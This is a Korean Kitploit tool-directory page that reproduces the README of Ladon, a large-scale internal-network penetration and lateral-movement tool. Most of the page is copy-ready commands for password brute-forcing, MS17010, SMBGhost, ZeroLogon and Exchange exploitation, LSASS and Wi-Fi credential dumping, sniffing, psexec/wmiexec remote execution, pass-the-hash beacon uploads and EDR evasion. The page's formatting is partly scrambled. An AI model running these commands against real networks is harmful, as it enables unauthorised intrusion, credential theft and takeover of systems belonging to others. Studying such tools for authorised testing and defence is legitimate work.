Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Ladon — Ladon 대규모 내부망 침투 스캐너, PowerShell, Cobalt Strike 플러그인, 메모리 로드, 무파일 스캔. 포트 스캔, 서비스 식별, 네트워크 자산 탐지, 비밀번호 감사, 고위험 취약점 탐지, 취약점 악용, 비밀번호 읽기 및 원클릭 GetShell을 포함하며, 대량 A세그먼트/B세그먼트/C세그먼트 및 네트워크 세그먼트 간 스캔을 지원하고 URL, 호스트, 도메인 목록 스캔 등을 지원합니다. 네트워크 자산 탐지는 32가지 프로토콜(ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP) 또는 방법으로 대상 네트워크의 활성 호스트 IP, 컴퓨터 이름, 작업 그룹, 공유 리소스, 네트워크 카드 주소, 운영 체제 버전, 웹사이트, 하위 도메인, 미들웨어, 개방 서비스, 라우터, 스위치, 데이터베이스, 프린터 등을 신속하게 획득하며, 다수의 고위험 취약점 탐지 모듈 MS17010, Zimbra, Exchange | Kitploit
도구/GitHubGitHub/k8gege/ladon
Privilege EscalationReconnaissanceVulnerability ScannersNetwork MappingPassword AttacksPort ScanningExploitationLateral MovementInformation GatheringWeb SecurityPenetration TestingSubdomain Enumeration
5.3k8821년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →

소개

Ladon 대규모 내부망 침투 스캐너, PowerShell, Cobalt Strike 플러그인, 메모리 로드, 무파일 스캔. 포트 스캔, 서비스 식별, 네트워크 자산 탐지, 비밀번호 감사, 고위험 취약점 탐지, 취약점 악용, 비밀번호 읽기 및 원클릭 GetShell을 포함하며, 대량 A세그먼트/B세그먼트/C세그먼트 및 네트워크 세그먼트 간 스캔을 지원하고 URL, 호스트, 도메인 목록 스캔 등을 지원합니다. 네트워크 자산 탐지는 32가지 프로토콜(ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP) 또는 방법으로 대상 네트워크의 활성 호스트 IP, 컴퓨터 이름, 작업 그룹, 공유 리소스, 네트워크 카드 주소, 운영 체제 버전, 웹사이트, 하위 도메인, 미들웨어, 개방 서비스, 라우터, 스위치, 데이터베이스, 프린터 등을 신속하게 획득하며, 다수의 고위험 취약점 탐지 모듈 MS17010, Zimbra, Exchange

GitHubk8gege/ladon

Ladon

저장소 보기웹사이트
공유

Ladon 대규모 내망 침투 스캐너 Cobalt Strike 플러그인 메모리 로드

Author Ladon Bin GitHub issues Github Stars GitHub forks GitHub license Downloads

image

프로그램 소개

Ladon 대규모 내망 침투 스캐너\도메인 침투\횡적 이동 도구, PowerShell 모듈, Cobalt Strike 플러그인, 메모리 로드, 무파일 스캔. 포트 스캔, 서비스 식별, 네트워크 자산 탐지, 비밀번호 감사, 고위험 취약점 탐지, 취약점 이용, 비밀번호 읽기 및 원클릭 GetShell을 포함하며, 배치 A세그먼트/B세그먼트/C세그먼트 및 크로스 네트워크 세그먼트 스캔을 지원하고, URL, 호스트, 도메인 목록 스캔 등을 지원합니다. 12.2 버전에는 262개 기능 모듈이 내장되어 있으며, 네트워크 자산 탐지 모듈은 30+ 프로토콜(ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP)과 방법을 지원하여 대상 네트워크의 생존 호스트 IP, 컴퓨터 이름, 작업 그룹, 공유 리소스, NIC 주소, 운영 체제 버전, 웹사이트, 서브도메인, 미들웨어, 오픈 서비스, 라우터, 스위치, 데이터베이스, 프린터 등의 정보를 빠르게 획득합니다. 고위험 취약점 탐지 16+는 Cisco, Zimbra, Exchange, DrayTek, MS17010, SMBGhost, Weblogic, ActiveMQ, Tomcat, Struts2 시리즈, Printer 등을 포함합니다. 비밀번호 감사 25+는 데이터베이스(Mysql, Oracle, MSSQL), FTP, SSH, VNC, Windows(LDAP, SMB/IPC, NBT, WMI, SmbHash, WmiHash, Winrm), BasicAuth, Tomcat, Weblogic, Rar 등을 포함합니다. 원격 명령 실행은 (smbexec/wmiexe/psexec/atexec/sshexec/webshell)을 포함하며, Web 핑거프린트 식별 모듈은 135+ (Web 애플리케이션, 미들웨어, 스크립트 유형, 페이지 유형) 등을 식별할 수 있습니다. 로컬 권한 상승 21+는 SweetPotato\BadPotato\EfsPotato\BypassUAC를 포함합니다. 고도로 사용자 정의 가능한 플러그인 POC는 .NET 어셈블리, DLL(C#/Delphi/VC), PowerShell 등 언어로 작성된 플러그인을 지원하며, INI 구성을 통해 임의의 외부 프로그램이나 명령을 배치 호출할 수 있습니다. EXP 생성기는 원클릭으로 취약점 POC/EXP를 생성하여 스캔 기능을 빠르게 확장할 수 있습니다. Ladon은 Cobalt Strike 플러그인형 메모리 로드를 지원하며, 무파일 스캔으로 내망을 빠르게 횡적 이동할 수 있습니다.

Ladon 다운로드```Bash

https://github.com/k8gege/Ladon/releases https://k8gege.org/Download

root@kitploit:~
### 사용 간편

Ladon은 기능이 풍부하고 다양하지만 사용법은 매우 간단하여 누구나 쉽게 익힐 수 있습니다<br>
단 한두 개의 인자만으로 90%의 기능을 사용할 수 있으며, 하나의 모듈이 곧 하나의 새로운 도구와 같습니다

### 실행 환경

#### Windows

Ladon은 .net 2.0 이상 버전이 설치된 Windows 시스템에서 사용할 수 있습니다(Win7 이후 시스템에는 .net 기본 내장)<br>
Cmd, PowerShell, 원격 제어 Cmd, WebShell 등뿐만 아니라 Cobalt Strike 메모리 로드로도 사용할 수 있습니다<br>
Ladon.ps1은 Win7-Win11/2025 PowerShell과 완벽 호환되며, 버전을 가리지 않고 원격 로드로 파일 없는(fileless) 침투가 가능합니다

#### 전 플랫폼 LadonGo는 Linux, Mac, Arm, MIPS 지원

전 플랫폼: Linux, MacOS, Windows, 라우터, 네트워크 장비 등 OS 시스템<br>
https://github.com/k8gege/LadonGo

### 까다로운 조건

실전은 그리 순조롭지 않아, 일부 내부 네트워크는 포워딩 후 매우 느리거나 포워딩이 불가능하여 도구를 대상에 업로드할 수밖에 없습니다<br>
일부 트로이 목마는 2~3MB 프로그램 업로드에도 한참 걸리거나 아예 불가능할 수 있으며, PY의 수십 MB는 말할 것도 없습니다<br>
Ladon은 C#으로 개발되어 프로그램 크기가 약 500K로 매우 작아, 트로이 목마가 불가능해도 500K 프로그램은 업로드할 수 있을 것입니다<br>
그것도 안 된다면 PowerShell 원격 메모리 로드를 사용할 수 있는데, 이 점은 PY나 GO로 컴파일된 대형 프로그램이 비교할 수 없는 부분입니다

### 목적

원스톱 서비스로, 사용자에게 간단하고 사용하기 쉬우며 기능이 풍부하고 유연성이 높은 스캔 도구를 제공합니다

### 특징

스캔 트래픽 적음<br>
프로그램 크기 작음<br>
기능 풍부하고 강력함<br>
프로그램 간단하고 사용하기 쉬움<br>
플러그인 다중 언어 지원<br>
크로스 플랫폼(Win/Kali/Ubuntu) 등<br>
Cobalt Strike 플러그인화 지원<br>
PowerShell 파일 없는(fileless) 침투 지원<br>
Exp 생성기로 Poc 원클릭 생성 가능<br>
다양한 환경에 적용 가능한 다중 버전

### 프로그램 매개변수 기능

1  지정 IP 스캔 지원<br>
2  지정 도메인 스캔 지원<br>
3  지정 머신 이름 스캔 지원<br>
4  지정 C 대역 스캔 지원(ip/24)<br>
5  지정 B 대역 스캔 지원(ip/16)<br>
6  지정 A 대역 스캔 지원(ip/8)<br>
7  지정 URL 스캔 지원<br>
8  일괄 IP 스캔 지원(ip.txt)<br>
9  일괄 C 대역 스캔 지원(ip24.txt)<br>
10 일괄 C 대역 스캔 지원(ipc.txt)<br>
11 일괄 B 대역 스캔 지원(ip16.txt)<br>
12 일괄 URL 스캔 지원(url.txt)<br>
13 일괄 도메인 스캔 지원(domain.txt)<br>
14 일괄 머신 이름 스캔 지원(host.txt)<br>
15 일괄 국가 대역 스캔 지원(cidr.txt)<br>
16 일괄 문자열 목록 지원(str.txt)<br>
17 호스트 계정/비밀번호 목록 지원(check.txt)<br>
18 사용자/비밀번호 목록 지원(userpass.txt)<br>
19 지정 범위 C 대역 스캔 지원<br>
20 매개변수로 사용자 정의 DLL 로드 지원(C# 전용)<br>
21 매개변수로 사용자 정의 EXE 로드 지원(C# 전용)<br>
22 매개변수로 사용자 정의 INI 구성 파일 로드 지원<br>
23 매개변수로 사용자 정의 PowerShell 로드 지원<br>
24 사용자 정의 프로그램 지원(시스템 명령 또는 타사 프로그램, 즉 임의 언어로 개발된 프로그램이나 스크립트)<br>
25 플러그인(다중 언어 지원 C#/Delphi/Golang/Python/VC/PowerShell)<br>
26 Cobalt Strike 지원(beacon 명령줄에서 대상 내부 네트워크 스캔 또는 점프 호스트를 통한 외부 네트워크 대상 스캔)<br>
27 CIDR 형식 IP 스캔 지원, 예: 100.64.0.0/10, 192.168.1.1/20 등<br>
28 INI 구성으로 사용자 정의 프로그램 비밀번호 무차별 대입 지원<br>

### 간결 사용 튜토리얼

Ladon 간결 사용 튜토리얼 전체 문서: http://k8gege.org/Ladon <br>
Excel 모듈 기능 문서: http://k8gege.org/Ladon/wiki.xlsx <br>
Cmd, Cobalt Strike, PowerShell 등 메모리 로드 지원<br>
Windows 버전: .Net, Cobalt Strike, PowerShell<br>
전체 시스템 버전: GO(전 플랫폼), Python(이론상 전 플랫폼)<br>
PS: Study는 로컬 학습용으로 편리하며, 전체 기능은 CMD를 사용하세요

### BypassEDR 스캔

기본 스캔 속도는 매우 빠르지만, 일부 WAF나 EDR 방어는 매우 강력합니다<br>
스레드를 몇 개로 설정해도 약 20분이면 스캔이 불가능해질 수 있습니다<br>
bypassEDR은 사람의 접근을 모의하여 속도 감지 정책을 우회합니다<br>
스캔 속도가 느리므로, 속도만 좇는 무모한 사람은 사용하지 마세요```Bash
Ladon 10.1.2.8/24 MS17010 bypassEDR

비밀번호 무차별 대입 관련 모듈은 현재 bypassEDR 매개변수를 지원하지 않습니다

001 사용자 정의 스레드 스캔

예: 대상 10.1.2 세그먼트에 MS17010 취약점이 존재하는지 스캔
단일 스레드:```Bash Ladon 10.1.2.8/24 MS17010 t=1

root@kitploit:~
80스레드:```Bash
Ladon noping 10.1.2.8/24 MS17010 t=80

고강도 보호 하에서는 스캔 스레드를 낮게 설정하고, F는 단일 스레드
```Bash Ladon 10.1.2.8/24 MS17010 f=1

root@kitploit:~
### 002 Socks5 프록시 스캔
예: 8개의 스레드를 사용하여 대상 10.1.2 대역에 MS17010 취약점이 존재하는지 스캔합니다.<br>```Bash
Ladon noping 10.1.2.8/24 MS17010 t=8

详见:http://k8gege.org/Ladon/proxy.html

PS:프록시 도구는 Socks5를 지원하지 않으므로 반드시 noping 매개변수를 추가하여 스캔해야 합니다.
Frp든 다른 유사 도구든, 가장 중요한 것은 Proxifier 등 도구가 ICMP 프로토콜을 지원하지 않는다는 점입니다.
Ladon은 기본적으로 먼저 ICMP로 생존 여부를 탐지한 후 해당 모듈로 테스트하기 때문입니다.
따라서 프록시 환경에서는 ping 스캔을 비활성화해야 합니다. 시스템 ping은 ICMP 프로토콜을 사용합니다.

003 네트워크 세그먼트 스캔/배치 스캔

CIDR 형식: /24/16/8(모든)뿐만 아니라```Bash Ladon 192.168.1.8/24 扫描模块 Ladon 192.168.1.8/16 扫描模块 Ladon 192.168.1.8/8 扫描模块

root@kitploit:~
알파벳 형식: C단, B단, A단만 순서대로 정렬```Bash
Ladon 192.168.1.8/c 扫描模块
Ladon 192.168.1.8/b 扫描模块
Ladon 192.168.1.8/a 扫描模块

0x004 지정 IP 범위, 네트워크 세그먼트 스캔

ICMP로 1세그먼트 50-200의 활성 호스트 탐지```Bash

Ladon 192.168.1.50-192.168.1.200 ICMP

root@kitploit:~
#### ICMP 1.30~50.80 생존 호스트 탐지```Bash
Ladon 192.168.1.30-192.168.50.80 ICMP  

TXT 형식

004 ICMP 일괄 스캔 C 대역 목록 생존 호스트```Bash

Ladon ip24.txt ICMP Ladon ipc.txt ICMP

root@kitploit:~
##### 005 ICMP 일괄 스캔 B 대역 목록 활성 호스트```Bash
Ladon ip16.txt ICMP
006 ICMP 일괄 스캔 cidr 목록(예: 특정 국가의 IP 대역)```Bash

Ladon cidr.txt ICMP

root@kitploit:~
##### 007 ICMP 일괄 스캔으로 도메인 생존 여부 확인```Bash
Ladon domain.txt ICMP
008 ICMP 일괄 스캔으로 머신 생존 여부 확인 호스트명 또는 머신명으로 탐지```Bash

Ladon host.txt ICMP

root@kitploit:~
##### 009 WhatCMS CMS, Banner, SSL 인증서, 제목 일괄 식별, 미지의 CMS, 라우터, 프린터, 네트워크 장치, 카메라 등 식별 가능```Bash
Ladon 192.168.1.8 WhatCMS   扫描IP
Ladon 192.168.1.8/24 WhatCMS   扫描C段
Ladon 192.168.1.8/C WhatCMS   扫描C段
Ladon 192.168.1.8/B WhatCMS   扫描B段
Ladon 192.168.1.8/A WhatCMS   扫描A段
Ladon IP.TXT WhatCMS   扫描IP列表
Ladon IP24.TXT WhatCMS   扫描C段列表
Ladon IP16.TXT WhatCMS   扫描B段列表
Ladon cidr.TXT WhatCMS   扫描整个国家IP段列表
禁PING扫描<br>
Ladon noping 192.168.1.8 WhatCMS   扫描IP
Ladon noping 192.168.1.8/24 WhatCMS   扫描C段
010 DrayTek 라우터 버전, 취약점, 약한 비밀번호 일괄 탐지```Bash

Ladon url.txt DraytekPoc

root@kitploit:~
##### 011 Base64 비밀번호 일괄 복호화```Bash
Ladon str.txt DeBase64

자산 스캔, 핑거프린트 식별, 서비스 식별, 활성 호스트, 포트 스캔

image

012 ICMP 활성 호스트 스캔(가장 빠름)```Bash

Ladon 192.168.1.8/24 ICMP

root@kitploit:~
##### 013 Ping을 이용한 생존 호스트 탐지(시스템 Ping 명령 호출, ms·ttl 등 정보 반환)```Bash
Ladon 192.168.1.8/24 Ping

만약 ping 명령이 통과해야만 호스트가 살아있다고 생각한다면, 이 명령으로 일괄 처리할 수 있습니다

014 다중 프로토콜 활성 호스트 탐지 (IP, 호스트 이름, MAC/도메인, 제조사/시스템 버전)```Bash

Ladon 192.168.1.8/24 OnlinePC

root@kitploit:~
##### 015 다중 프로토콜 운영체제 식별 (IP, 시스템 이름, 운영체제 버전, 공개 서비스)```Bash
Ladon 192.168.1.8/24 OsInfo
016 OXID 다중 NIC 호스트 탐지```Bash

Ladon 192.168.1.8/24 EthInfo Ladon 192.168.1.8/24 OxidInfo

root@kitploit:~
##### 017 DNS 다중 NIC 호스트 탐지```Bash
Ladon 192.168.1.8/24 DnsInfo
018 다중 프로토콜 스캔 생존 호스트 IP```Bash

Ladon 192.168.1.8/24 OnlineIP

root@kitploit:~
##### 019 SMB 취약점 MS17010 스캔 (IP, 컴퓨터 이름, 취약점 번호, 운영 체제 버전)```Bash
Ladon 192.168.1.8/24 MS17010
020 SMBGhost 취약점 탐지 CVE-2020-0796 (IP、머신 이름、취약점 번호、운영 체제 버전)```Bash

Ladon 192.168.1.8/24 SMBGhost

root@kitploit:~
##### 021 웹 제목 스캔 Banner 더 자세한 정보는 WhatCMS 모듈 탐지를 사용하세요```Bash
Ladon 192.168.1.8/24 WebInfo
Ladon http://192.168.1.8 WebInfo
Ladon 192.168.1.8/24 WebScan
Ladon http://192.168.1.8 WebScan
022 C 대역 사이트 URL 도메인 스캔```Bash

Ladon 192.168.1.8/24 UrlScan

root@kitploit:~
##### 023 C대역 사이트 URL 도메인 스캔```Bash
Ladon 192.168.1.8/24 SameWeb
024 하위 도메인, 2차 도메인 스캔```Bash

Ladon baidu.com SubDomain

root@kitploit:~
##### 025 도메인 해석 IP、호스트명 해석 IP```Bash
Ladon baidu.com DomainIP
Ladon baidu.com HostIP
025 일괄 도메인 이름 해석 IP, 일괄 호스트 이름 해석 IP```Bash

Ladon domain.txt DomainIP Ladon host.txt HostIP

root@kitploit:~
##### 025 대량 도메인, 호스트명 해석 결과 IP만```Bash
Ladon domain.txt Domain2IP
Ladon host.txt Host2IP
026 도메인 내 머신, IP DNS 조회 (조건: 도메인 내, DC IP 지정)```Bash

Ladon AdiDnsDump 192.168.1.8

root@kitploit:~
##### 027 도메인 내 머신, IP 조회 (도메인 내)
Ladon GetDomainIP

##### 028 C 대역 포트 스캔, 지정 포트 스캔```Bash
Ladon 192.168.1.8/24 PortScan
Ladon 192.168.1.8 PortScan 80,445,3389
029 C 대역 웹 스캔 및 CMS 식별(800+ 웹 핑거프린트 식별)```Bash

Ladon 192.168.1.8/24 CMS Ladon 192.168.1.8/24 CmsInfo Ladon 192.168.1.8/24 WhatCMS

root@kitploit:~
##### 030 Cisco 장치 스캔```Bash
Ladon 192.168.1.8/24 CiscoInfo
Ladon http://192.168.1.8 CiscoInfo
031 Mssql 데이터베이스 호스트 열거 (데이터베이스 IP, 머신 이름, SQL 버전)```Bash

Ladon EnumMssql

root@kitploit:~
##### 032 네트워크 공유 리소스 열거 	(도메인, IP, 호스트명\공유 경로)```Bash
Ladon EnumShare
033 LDAP 서버 스캔(도메인 컨트롤러 탐지)```Bash

Ladon 192.168.1.8/24 LdapInfo

root@kitploit:~
##### 034 FTP 서버 스캔 및 버전 식별```Bash
Ladon 192.168.1.8/24 FtpInfo

무차별 대입/네트워크 인증/약한 비밀번호/비밀번호 크래킹/데이터베이스/웹사이트 백엔드/로그인 진입점/시스템 로그인

image 비밀번호 크래킹 상세는 SSH 참조:http://k8gege.org/Ladon/sshscan.html

035 445 포트 SMB 비밀번호 크래킹(Windows)```Bash

Ladon 192.168.1.8/24 SmbScan

root@kitploit:~
##### 036 135 포트 Wmi 비밀번호 무차별 대입(Windowns)```Bash
Ladon 192.168.1.8/24 WmiScan
037 389 포트 LDAP 서버, AD 도메인 비밀번호 무차별 대입(Windows)```Bash

Ladon 192.168.1.8/24 LdapScan

root@kitploit:~
##### 038 5985포트 Winrm 비밀번호 무차별 대입(Windowns)```Bash
Ladon 192.168.1.8/24 WinrmScan
039 445포트 SMB NTLM HASH 무차별 대입(Windows)```Bash

Ladon 192.168.1.8/24 SmbHashScan

root@kitploit:~
##### 040 135 포트 Wmi NTLM HASH 브루트포스(Windows)```Bash
Ladon 192.168.1.8/24 WmiHashScan
041 22번 포트 SSH 비밀번호 무차별 대입(Linux)```Bash

Ladon 192.168.1.8/24 SshScan Ladon 192.168.1.8:22 SshScan

root@kitploit:~
##### 042 1433 포트 Mssql 데이터베이스 비밀번호 무차별 대입```Bash
Ladon 192.168.1.8/24 MssqlScan
043 1521 포트 Oracle 데이터베이스 비밀번호 무차별 대입```Bash

Ladon 192.168.1.8/24 OracleScan

root@kitploit:~
Oracle 데이터베이스는 특별해서 ORCL 데이터베이스만 무차별 대입하면 많은 권한을 놓칠 수 있습니다<br>
자세한 내용: http://k8gege.org/Ladon/OracleScan.html<br>


##### 044 3306 포트 Mysql 데이터베이스 비밀번호 무차별 대입```Bash
Ladon 192.168.1.8/24 MysqlScan
045 7001 포트 Weblogic 백엔드 비밀번호 무차별 대입```Bash

Ladon http://192.168.1.8:7001/console WeblogicScan Ladon 192.168.1.8/24 WeblogicScan

root@kitploit:~
##### 046 5900 포트 VNC 원격 데스크톱 비밀번호 무차별 대입```Bash
Ladon 192.168.1.8/24 VncScan
047 21번 포트 Ftp 서버 비밀번호 무차별 대입```Bash

Ladon 192.168.1.8/24 FtpScan

root@kitploit:~
##### 048 8080 포트 Tomcat 관리자 로그인 비밀번호 브루트포스```Bash
Ladon 192.168.1.8/24 TomcatScan
Ladon http://192.168.1.8:8080/manage TomcatScan
049 Web 포트 401 기본 인증 비밀번호 무차별 대입```Bash

Ladon http://192.168.1.8/login HttpBasicScan Ladon ip.txt 401Scan

root@kitploit:~
##### 052 139 포트 Netbios 프로토콜 Windows 비밀번호 무차별 대입```Bash
Ladon 192.168.1.8/24 NbtScan
053 5985 포트 Winrm 프로토콜 Windows 비밀번호 무차별 대입```Bash

Ladon 192.168.1.8/24 WinrmScan

root@kitploit:~
##### 054 네트워크 카메라 비밀번호 브루트포스(기본 비밀번호 내장)```Bash
Ladon 192.168.1.8/24 DvrScan

취약점 탐지/Poc

image

055 SMB 취약점 탐지(CVE-2017-0143/CVE-2017-0144)```Bash

Ladon 192.168.1.8/24 MS17010

root@kitploit:~
##### 056 SMBGhost 취약점 탐지 CVE-2020-0796		911 예약```Bash
Ladon 192.168.1.8/24 SMBGhost
057 Weblogic 취약점 탐지(CVE-2019-2725/CVE-2018-2894)```Bash

Ladon 192.168.1.8/24 WeblogicPoc

root@kitploit:~
##### 058 PhpStudy 백도어 탐지(phpstudy 2016/phpstudy 2018)  10.9 제거 911 유지```Bash
Ladon 192.168.1.8/24 PhpStudyPoc
059 ActiveMQ 취약점 탐지(CVE-2016-3088)```Bash

Ladon 192.168.1.8/24 ActivemqPoc

root@kitploit:~
##### 060 Tomcat 취약점 탐지(CVE-2017-12615)```Bash
Ladon 192.168.1.8/24 TomcatPoc
061 Struts2 취약점 탐지(S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode/S2-045/S2-037)```Bash

Ladon 192.168.1.8/24 Struts2Poc

root@kitploit:~
##### 062 DraytekPoc CVE-2020-8515 취약점 탐지, Draytek 버전 탐지, 약한 암호 탐지```Bash
Ladon 192.168.1.8 DraytekPoc
Ladon 192.168.1.8/24 DraytekPoc
FortiGate CVE-2024-55591 비인가 RCE 취약점 탐지```Bash

Ladon 192.168.1.8/24 CVE-2024-55591

root@kitploit:~
### 취약점 악용/Exploit
![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

##### 063 Weblogic 취약점 악용(CVE-2019-2725)```Bash
Ladon 192.168.1.8/24 WeblogicExp
064 Tomcat 취약점 악용(CVE-2017-12615)```Bash

Ladon 192.168.1.8/24 TomcatExp

root@kitploit:~
##### 065 Windows 0day 취약점 범용 DLL 인젝션 CMD 실행 생성기(DLL 단 5KB)```Bash
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=
Ladon CmdDll b64x64 YwBhAGwAYwA=
066 CVE-2021-40444 Microsoft IE/Office 0day 취약점```Bash

Ladon CVE-2021-40444 MakeCab poc.dll Ladon CVE-2021-40444 MakeHtml http://192.168.1.8

root@kitploit:~
##### 067 DraytekExp CVE-2020-8515 원격 명령 실행 EXP```Bash
Ladon DraytekExp http://192.168.1.8  whoami
068 도메인 침투 ZeroLogon CVE-2020-1472 도메인 컨트롤러 권한 상승(암호 공백화)```Bash

Ladon ZeroLogon dc.k8gege.org

root@kitploit:~
##### 069 CVE-2020-0688 Exchange 직렬화 취약점(.net 4.0)```Bash
Ladon cve-2020-0688 192.168.1.142 Administrator K8gege520
070 ForExec 루프 취약점 악용(Win10 이터널블랙 CVE-2020-0796, 성공 후 종료하여 대상 블루스크린 방지)```Bash

Ladon ForExec "CVE-2020-0796-Exp -i 192.168.1.8 -p 445 -e --load-shellcode test.txt" 80 "Exploit finnished"

root@kitploit:~
### 파일 다운로드, 파일 전송

##### 071 내부망 파일 전송 HTTP 다운로드 HTTPS 다운로드 MSF 다운로드```Bash
Ladon wget https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe<br>
Ladon HttpDownLoad http://k8gege.org/Download/Ladon.rar
072 내부망 파일 전송 FTP 다운로드```Bash

Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe

root@kitploit:~
### 암호화/복호화(HEX/Base64)

##### 073 Hex 암호화/복호화```Bash
Ladon 123456 EnHex
Ladon 313233343536 DeHex
074 Base64 암호화/복호화```Bash

Ladon 123456 EnBase64 Ladon MTIzNDU2 DeBase64 Ladon str.txt DeBase64

root@kitploit:~
### 네트워크 스니핑

##### 075 FTP 비밀번호 스니핑(로컬 IP 바인딩, C 대역 자동 스니핑)
멀티 NIC 머신, 해당 C 대역 IP 스니핑```Bash
Ladon FtpSniffer 192.168.1.5
076 HTTP 비밀번호 스니핑(로컬 IP 바인딩, C 대역 자동 스니핑)

멀티 NIC 머신, 해당 C 대역 IP 스니핑```Bash Ladon HTTPSniffer 192.168.1.5

root@kitploit:~
##### 077 네트워크 스니핑```Bash
Ladon Sniffer

비밀번호 읽기

078 IIS 사이트 비밀번호, 웹사이트 경로 읽기```Bash

Ladon IISpwd

root@kitploit:~
##### 079 연결했던 WIFI 비밀번호 읽기```Bash
Ladon WifiPwd
080 FileZilla FTP 비밀번호 읽기```Bash

Ladon FileZillaPwd

root@kitploit:~
##### 081 시스템 Hash, VPN 비밀번호, DPAPI-Key 읽기  10.9에서 제거됨```Bash
Ladon CVE-2021-36934  
082 DumpLsass 메모리 비밀번호(mimikatz 평문) 9.1.1 버전 이전 한정```Bash

Ladon DumpLsass

root@kitploit:~
### 정보 수집

![image](http://k8gege.org/k8img/Ladon/Study/Linfo.PNG)

##### 083 API 현재 사용자 확인```Bash
Ladon w
Ladon whoami
083 로컬 내부 IP 및 외부 IP 가져오기```Bash

Ladon GetIP Ladon IPinfo

root@kitploit:~
##### 084 PCname GUID CPUID DiskID Mac 주소 획득```Bash
Ladon GetID
085 사용자의 최근 액세스 파일 보기```Bash

Ladon Recent

root@kitploit:~
##### 086 USB 드라이브, USB 사용 기록 조회(USB 이름, USB 표시, 경로 정보)```Bash
Ladon UsbLog
087 백도어 탐지(레지스트리 시작 항목, DLL 하이재킹)```Bash

Ladon CheckDoor Ladon AutoRun

root@kitploit:~
##### 088 프로세스 상세 정보(프로그램 경로、비트 수、시작 매개변수、사용자)```Bash
Ladon EnumProcess
Ladon Tasklist
089 명령줄 인수 가져오기```Bash

Ladon cmdline Ladon cmdline cmd.exe

root@kitploit:~
##### 090 침투 기본 정보 획득```Bash
Ladon GetInfo
Ladon GetInfo2
091 .NET & PowerShell 버전```Bash

Ladon NetVer Ladon PSver Ladon NetVersion Ladon PSversion

root@kitploit:~
##### 092 런타임 버전 & 컴파일 환경```Bash
Ladon Ver
Ladon Version
093 런타임 버전&컴파일 환경&설치 소프트웨어 목록```Bash

Ladon AllVer Ladon AllVersion

root@kitploit:~
##### 094 IE 프록시 정보 보기```Bash
Ladon QueryProxy
095 DirList 디렉터리 목록+기본 침투 정보
기본값은 전체 디스크 나열
```Bash

Ladon DirList

root@kitploit:~
###### 드라이브 문자 또는 디렉터리 지정```Bash
Ladon DirList c:\   
096 QueryAdmin 관리자 사용자 보기```Bash

Ladon QueryAdmin

root@kitploit:~
##### 097 로컬 명명된 파이프 보기```Bash
Ladon GetPipe
098 RdpLog 3389 연결 기록 보기```Bash

Ladon RdpLog

root@kitploit:~
### 원격 실행(psexec/wmiexec/atexec/sshexec/smbexec)

![image](http://k8gege.org/k8img/Ladon/Study/Rexec.PNG)

##### 099 445 포트 암호화 PSEXEC 원격 명령 실행(대화형)```Bash
net use \\192.168.1.8 k8gege520 /user:k8gege
Ladon psexec 192.168.1.8
psexec> whoami
nt authority\system
100 135 포트 WmiExec 원격 명령 실행 (비대화형)```Bash

Ladon wmiexec 192.168.1.8 k8gege k8gege520 cmd whoami Ladon wmiexec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p

root@kitploit:~
##### 101 445 포트 AtExec 원격 명령 실행(비대화형)```Bash
Ladon AtExec 192.168.1.8 k8gege k8gege520 whoami
102 22 포트 SshExec 원격 명령 실행(비대화식)```Bash

Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami

root@kitploit:~
##### 103 JspShell 원격 명령 실행(비대화형) 9.3.0에서 제거됨
사용법:Ladon JspShell type url pwd cmd```Bash
Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami
104 WebShell 원격 명령 실행(비대화형)9.3.0 제거```Bash

Usage:Ladon WebShell ScriptType ShellType url pwd cmd Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami Example: Ladon WebShell jsp 5 http://192.168.1.8/123.jsp Ladon whoami 获取系统版本信息 方便提权 Example: Ladon WebShell jsp 5 http://192.168.1.8/123.jsp Ladon OSinfo

root@kitploit:~
##### 105 135 포트 WmiExec2 원격 명령 실행 HASH 지원 (비대화식) 파일 업로드 지원```Bash
Ladon WmiExec2 host user pass cmd whoami
Ladon WmiExec2 pth host cmd whoami		 先Mimikatz注入Hash,再pth执行命令
Base64Cmd for Cobalt Strike
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Upload:
Ladon WmiExec2 host user pass upload beacon.exe ceacon.exe
Ladon WmiExec2 pth host upload beacon.exe ceacon.exe  先Mimikatz注入Hash,再pth执行命令
106 445 포트 SmbExec Ntlm-Hash 비대화형 원격 명령 실행(출력 없음)```Bash

Ladon SmbExec 192.168.1.8 k8gege k8gege520 cmd whoami Ladon SmbExec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p

root@kitploit:~
##### 107 WinrmExec 원격 명령 실행 출력 없음(System 권한 지원)```Bash
Ladon WinrmExec 192.168.1.8 5985 k8gege.org Administrator K8gege520 calc.exe

권한 상승 및 하강

image

108 whoami 현재 사용자 권한 및 특권 확인```Bash

Ladon whoami

root@kitploit:~
